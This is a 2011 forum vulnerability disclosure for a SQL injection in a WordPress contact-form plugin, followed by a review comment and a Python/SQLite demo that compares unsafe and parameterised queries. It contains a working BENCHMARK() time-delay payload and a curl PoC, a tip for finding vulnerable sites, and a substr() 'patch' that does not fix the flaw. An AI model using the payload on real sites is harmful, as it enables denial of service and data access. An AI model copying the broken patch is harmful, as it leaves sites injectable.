WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability

No replies
skraps
Neophyte
Joined: 2011/10/12

Ok, I was bored today and thought I'd try my hand at finding a SQL injection problem in some WordPress plugins. Lo and behold, I found one. It wasn't that hard and it really doesn't do much. You could perform a DoS attack with this, and that would be lame, and that's why they need to fix it. Then again, if your host has proper mysqld kill scripts set in place, it's only a small annoyance.

You can find the plugin page right here http://wordpress.org/extend/plugins/contact-form-wordpress/

It's actually one of the more popular plugins people use, for some reason. So I guess if you wrote a script to search for id="easyform" in the HTML output you could find a lot of blogs using this; it's only been downloaded 1,666 times, so there have to be at least 600 blogs out there using it.

Remember that WOW upside down spells MOM. Keep that in mind for future reference. OFYLTA

# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
# Version: 2.7.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1
---------------
Vulnerable code
---------------
Line 49:
    public function the_content($content) {
        global $wpdb;
        global $table_name;
        global $settings_table_name;

        $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

        if ($_POST['wpcf_easyform_submitted'] == 1) {

            $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

---------------
Patch
---------------

*** ./easy-form.class.php.orig  2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php       2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
         
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!        
!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
             
              $continue = true;
             
--- 54,63 ----
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
         
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!                   $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);
!            
!       $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
             
              $continue = true;
             
***************
*** 71,80 ****
              if ($continue) {
             
                  //loop through the fields of this form (read from DB) and build the message here
!                 $form_fields = $wpdb->get_results("
                                SELECT *
                                FROM $settings_table_name
!                               WHERE form_id = ".$_POST['wpcf_easyform_formid']."
                                ORDER BY position
                        ");
                       
--- 73,82 ----
              if ($continue) {
             
                  //loop through the fields of this form (read from DB) and build the message here
!               $form_fields = $wpdb->get_results("
                                SELECT *
                                FROM $settings_table_name
!                               WHERE form_id = ".$wpcf_easyform_formid."
                                ORDER BY position
                        ");
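Review bot: the second query inherits the same weakness: `$wpcf_easyform_formid` is still the raw POST value minus two characters, so `WHERE form_id = ".$wpcf_easyform_formid."` is injectable exactly as the original `$_POST['wpcf_easyform_formid']` was. If the variable is validated with absint()/intval() once at the top of the handler this hunk can simply reuse it; otherwise this statement should go through `$wpdb->prepare("... WHERE form_id = %d ...", $wpcf_easyform_formid)` as well, since a fix applied to only one of the two queries leaves the other as a live injection point.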
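As an added example (not code from the original post or from the plugin), the three ways of building the lookup that appear in this thread side by side in Python against an in-memory SQLite table: the straight concatenation from easy-form.class.php, the substr() patch, and a validated, parameterised lookup. The table name and rows are constructed for the demo, and because SQLite has no BENCHMARK() a boolean tautology stands in for the PoC's delay payload; the injection point is the same.

```python
import re
import sqlite3

# Constructed stand-in for the plugin's forms table (the real name is whatever
# $table_name expands to in WordPress; "wp_contact_forms" is an assumption).
SCHEMA = "CREATE TABLE wp_contact_forms (ID INTEGER PRIMARY KEY, name TEXT)"
ROWS = [(1, "contact"), (2, "support"), (3, "internal")]


def make_db():
    """In-memory SQLite database seeded with the constructed rows above."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.executemany("INSERT INTO wp_contact_forms (ID, name) VALUES (?, ?)", ROWS)
    return db


def vulnerable_lookup(db, formid):
    """Mirrors easy-form.class.php: the POST value is glued into the SQL text."""
    sql = "SELECT * FROM wp_contact_forms WHERE ID = " + formid
    return db.execute(sql).fetchall()


def substr_patch_lookup(db, formid):
    """Mirrors the forum patch: drop two leading characters, then concatenate."""
    return vulnerable_lookup(db, formid[2:])


_FORM_ID = re.compile(r"[0-9]{1,9}")


def safe_lookup(db, formid):
    """Validate the id as a non-negative integer and bind it as a parameter.

    This is the equivalent of absint() plus $wpdb->prepare("... = %d") in
    WordPress: the value can never change the structure of the statement.
    """
    if not _FORM_ID.fullmatch(formid):
        raise ValueError("wpcf_easyform_formid must be a non-negative integer")
    sql = "SELECT * FROM wp_contact_forms WHERE ID = ?"
    return db.execute(sql, (int(formid),)).fetchall()


def outcome(lookup, formid):
    """Run one strategy on one input; report rows returned or the error raised."""
    db = make_db()
    try:
        return {"rows": len(lookup(db, formid))}
    except (sqlite3.Error, ValueError) as exc:
        return {"error": type(exc).__name__}


# SQLite has no BENCHMARK(), so a tautology stands in for the PoC's
# time-delay payload; two throwaway characters absorb substr(..., 2).
INJECTED = "1 OR 1=1"
INJECTED_PAST_SUBSTR = "xx" + INJECTED

if __name__ == "__main__":
    strategies = [("vulnerable", vulnerable_lookup),
                  ("substr patch", substr_patch_lookup),
                  ("prepared", safe_lookup)]
    for name, fn in strategies:
        for payload in ("1", INJECTED, INJECTED_PAST_SUBSTR):
            print(f"{name:13s} {payload!r:16s} -> {outcome(fn, payload)}")
```

Running it shows the concatenated query returning every form for `1 OR 1=1`, the substr() version failing on the legitimate id `1` (the statement ends in `WHERE ID = `) while still returning every form for `xx1 OR 1=1`, and the validated lookup rejecting both payloads before any SQL is built.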